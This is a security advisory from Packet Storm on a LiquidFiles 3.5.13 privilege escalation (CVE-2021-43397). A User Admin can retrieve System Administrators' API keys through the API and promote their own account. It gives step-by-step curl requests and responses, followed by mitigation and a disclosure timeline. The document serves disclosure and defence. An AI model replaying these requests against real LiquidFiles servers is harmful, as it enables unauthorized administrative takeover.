exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LiquidFiles 3.5.13 Privilege Escalation

LiquidFiles 3.5.13 Privilege Escalation
Posted Nov 17, 2021
Authored by Eliana Cannella, Valerio Casalino, Riccardo Spampinato

LiquidFiles version 3.5.13 suffers from a privilege escalation vulnerability. The LiquidFiles API allows a User Admin to access keys for System Administrators.

tags | exploit
advisories | CVE-2021-43397
SHA-256 | bf9b58acae02929b7e3bacefe79b18576f37054b1cc772c21d9b054246ca69cb

LiquidFiles 3.5.13 Privilege Escalation

Change Mirror Download
===============================================================================
title: LiquidFiles Privilege Escalation
product: LiquidFiles v3.5.13
vulnerability type: Privilege Escalation
severity: High
CVSSv3 score: 8.8
CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
found: 2021-10-29
by: Riccardo Spampinato, Eliana Cannella, Valerio
Casalino
===============================================================================

[EXECUTIVE SUMMARY]
LiquidFiles is a secure file transfer system for person-to-person email
communication.
During an engagement for our customer we discovered a Privilege Escalation
from "User Admin" user to "System Administrator" user.
Using LiquidFiles API, a "User Admin" user can list all the application
registered users, retrieving information such as their API keys, including
those of the System Administrators. As per LiquidFiles documentation, API
key is used as HTTP basic authentication in order to authenticate to the
LiquidFiles system.
A malicious "User Admin" user, by using a 'System Administrator's API key,
can obtain the role of System Administrator and can administer all aspects
of the LiquidFiles system.
The impact of a successful attack includes: obtaining access to all aspects
of the LiquidFiles system of the application via the System Administrator
API key.


[VULNERABLE VERSIONS]
The following version of LiquidFiles system is affected by the
vulnerability; previous versions may be vulnerable as well:
- LiquidFiles v3.5.13


[TECHNICAL DETAILS]
It is possible to reproduce the issue following these steps:
1. Get the API key of your own user-admins user;
2. With your own user-admins user's API key, get a sysadmins' API key via
/admin/users API;
3. With sysadmins' API key retrieved at the step below, issue
/admin/users/<user-admins_user_id> API modifying the group of your
user-admins user from "user-admins" to "sysadmins";
4. You are now a sysadmins user. You can verify it by either login again
with your own user via web GUI (you are now prompted to set a fallback
password to use in case LDAP authentication fails) or by issuing
/admin/users/<user-admins_user_id> API to view your own user.


Below a full transcript of the HTTP requests and responses used to raise
the vulnerability:

1. Get the API key of your own user-admins user

cURL Request:
curl -X POST -H "Accept: application/json" -H "Content-Type:
application/json" -d
'{"user":{"email":"[user-admins_user_mail]","password":"[CENSORED]"}}'
https://[CENSORED]/login

Response:
{"user":{"api_key":"[user-admins_user_API_key]"}}


2. Get a sysadmins' API key

cURL Request:
curl -s -X GET --user "[user-admins_user_API_key]:x" -H "Accept:
application/json" -H "Content-Type: application/json" https://
[CENSORED]/admin/users

Response:
[TRUNCATED]
{"user":
{
"id": "[CENSORED]",
"email": "[CENSORED]",
"name": "[CENSORED]",
"group": "sysadmins",
"max_file_size": 0,
"filedrop": "disabled",
"filedrop_email": "disabled",
"api_key": "[sysadmins_user_API_key]",
"ldap_authentication": "false",
"locale": "",
"time_zone": "",
"strong_auth_type": "",
"strong_auth_username": "",
"delivery_action": "",
"phone_number": "",
"last_login_at": "2021-10-29 10:02:11 UTC",
"last_login_ip": "[CENSORED]",
"created_at": "2020-06-30 10:49:38 UTC"
}
},
[TRUNCATED]


3. Modify the group of your own user-admins user from "user-admins" to
"sysadmins"

cURL Request:
cat <<EOF | curl -s -X PUT --user "[sysadmins_user_API_key]:x" -H "Accept:
application/json" -H "Content-Type: application/json" -d @- https://
[CENSORED]/admin/users/<user-admins_user_id>
{"user":
{
"name": "[user-admins_user_name]",
"group": "sysadmins"
}
}
EOF

Response
{"user":
{
"id": "[CENSORED]",
"email": "[CENSORED]",
"name": "[CENSORED]",
"group": "sysadmins",
"max_file_size": 0,
"filedrop": "disabled",
"filedrop_email": "disabled",
"api_key": "[CENSORED]",
"ldap_authentication": "true",
"locale": "",
"time_zone": "",
"strong_auth_type": "",
"strong_auth_username": "",
"delivery_action": "",
"phone_number": "",
"last_login_at": "2021-11-03 13:31:58 UTC",
"last_login_ip": "[CENSORED]",
"created_at": "2021-03-03 11:48:37 UTC"
}
}


4. Verify that your own user-admins user is now a sysadmins one.

cURL Request
curl -X GET -H "Accept: application/json" -H "Content-Type:
application/json" --user [user-admins_user_API_key]:x https://
[CENSORED]/admin/users/<user-admins_user_id>

Response
{"user":
{
"id": "[CENSORED]",
"email": "[CENSORED]",
"name": "[CENSORED]",
"group": "sysadmins",
"max_file_size": 0,
"filedrop": "disabled",
"filedrop_email": "disabled",
"api_key": "[CENSORED]",
"ldap_authentication": "true",
"locale": "",
"time_zone": "",
"strong_auth_type": "",
"strong_auth_username": "",
"delivery_action": "",
"phone_number": "",
"last_login_at": "2021-11-03 13:34:36 UTC",
"last_login_ip": "[CENSORED]",
"created_at": "2021-03-03 11:48:37 UTC"
}
}


[VULNERABILITY REFERENCE]
The following CVE ID was allocated to track the vulnerabilities:
CVE-2021-43397


[DISCLOSURE TIMELINE]
2021-11-02 Vulnerability submitted to vendor through vendor support portal.
Vendor requested more info and acknowledged the problem later.
2021-11-04 Researcher requested to allocate a CVE number.
Vendor released a fix for the reported issue.
2021-11-09 Researcher requested to publicly disclose the issue; public
coordinated disclosure.


[MITIGATION]
As per vendor suggestion, the vulnerability could be mitigated in versions
prior to 3.6.3 by disabling API in Admins groups.


[SOLUTION]
Version 3.6.3 (released 2021-11-09)
https://man.liquidfiles.com/release_notes/version_3-6-x.html


[NOTE]
Please note that the issue described in this advisory can be also raised
via Web GUI LiquidFiles Admin panel.


[CONTACT DETAILS]
Riccardo Spampinato riccardo.spampinato@mail-bip.com
Eliana Cannella eliana.cannella@mail-bip.com
Valerio Casalino valerio.casalino@mail-bip.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close